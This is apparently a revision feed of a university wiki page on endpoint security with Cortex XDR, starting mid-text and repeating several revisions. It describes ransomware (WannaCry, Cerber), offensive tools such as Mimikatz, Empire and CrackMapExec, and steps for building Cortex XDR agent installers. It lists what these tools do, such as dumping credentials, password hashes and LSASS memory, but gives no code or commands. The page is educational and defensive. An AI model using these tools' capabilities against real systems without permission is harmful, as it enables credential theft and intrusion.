WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
==Pentesting With Cortex XDR ==&lt;br /&gt;
&lt;br /&gt;
1- From Cortex XDR, select Endpoints → Agent Installations.&lt;br /&gt;
2- Create a new installation package.&lt;br /&gt;
3- Enter a unique Name and an optional Description to identify the installation package.&lt;br /&gt;
4- Select the Package Type.&lt;br /&gt;
&lt;br /&gt;
*Standalone Installers—Use for fresh installations and to Upgrade Cortex XDR Agents on a registered endpoint that is connected to Cortex XDR.&lt;br /&gt;
&lt;br /&gt;
*Upgrade from ESM—Use this package to upgrade Traps agents which connect to the on-premises Traps Endpoint Security Manager to Cortex XDR. For more information, see Migrate from Traps Endpoint Security Manager.&lt;br /&gt;
&lt;br /&gt;
*(Linux only) Kubernetes Installer—Use for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
*Helm Installer—Use this package for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
5- Specify the installation package settings.&lt;br /&gt;
6- Create the installation package.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR prepares your installation package and makes it available on the Agent Installations page.&lt;br /&gt;
7-Download your installation package.&lt;br /&gt;
&lt;br /&gt;
When the status of the package shows Completed, right-click the agent version, and click Download.&lt;br /&gt;
*For Windows endpoints, select between the architecture type. You can download the installer msi file only, or for Cortex XDR agents 7.4 and later, a distribution package that includes both the installer msi file and the latest content zip. The distribution package is recommended to reduce the network load and time typically required for the initial roll-out or major upgrades of the Cortex XDR agent. To understand the benefits, workflow, and requirements to support this type of deployment, refer to the Cortex XDR Agent Administrator Guide.&lt;br /&gt;
&lt;br /&gt;
*For macOS endpoints, download the ZIP installation folder and upload it to the endpoint. To deploy the Cortex XDR agent using JAMF, upload the ZIP folder to JAMF. Alternatively, to install the agent manually on the endpoint, unzip the ZIP folder and double-click the pkg file.&lt;br /&gt;
&lt;br /&gt;
*For Linux endpoints, you can download .rpm or .deb installers (according to the endpoint Linux distribution), and deploy the installers on the endpoints using the Linux package manager. Alternatively, you can download a Shell installer and deploy it manually on the endpoint.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
HP Notebook&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
*https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/7.9/Cortex-XDR-Agent-Administrator-Guide&lt;br /&gt;
*https://github.com/gentilkiwi/mimikatz&lt;br /&gt;
*https://github.com/Porchetta-Industries/CrackMapExec&lt;br /&gt;
*https://github.com/BC-SECURITY/Empire&lt;br /&gt;
*https://www.avast.com/de-de/c-cerber#:~:text=Link%20kopiert-,Was%20ist%20die%20Cerber%20Ransomware%3F,Sie%20wird%20eine%20L%C3%B6segeldzahlung%20verlangt.&lt;br /&gt;
*https://de.wikipedia.org/wiki/WannaCry&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11461</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11461"/>
		<updated>2023-02-03T16:41:30Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
==Pentesting With Cortex XDR ==&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
HP Notebook&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
*https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/7.9/Cortex-XDR-Agent-Administrator-Guide&lt;br /&gt;
*https://github.com/gentilkiwi/mimikatz&lt;br /&gt;
*https://github.com/Porchetta-Industries/CrackMapExec&lt;br /&gt;
*https://github.com/BC-SECURITY/Empire&lt;br /&gt;
*https://www.avast.com/de-de/c-cerber#:~:text=Link%20kopiert-,Was%20ist%20die%20Cerber%20Ransomware%3F,Sie%20wird%20eine%20L%C3%B6segeldzahlung%20verlangt.&lt;br /&gt;
*https://de.wikipedia.org/wiki/WannaCry&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11459</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11459"/>
		<updated>2023-02-03T16:39:17Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Used Hardware */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
HP Notebook&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
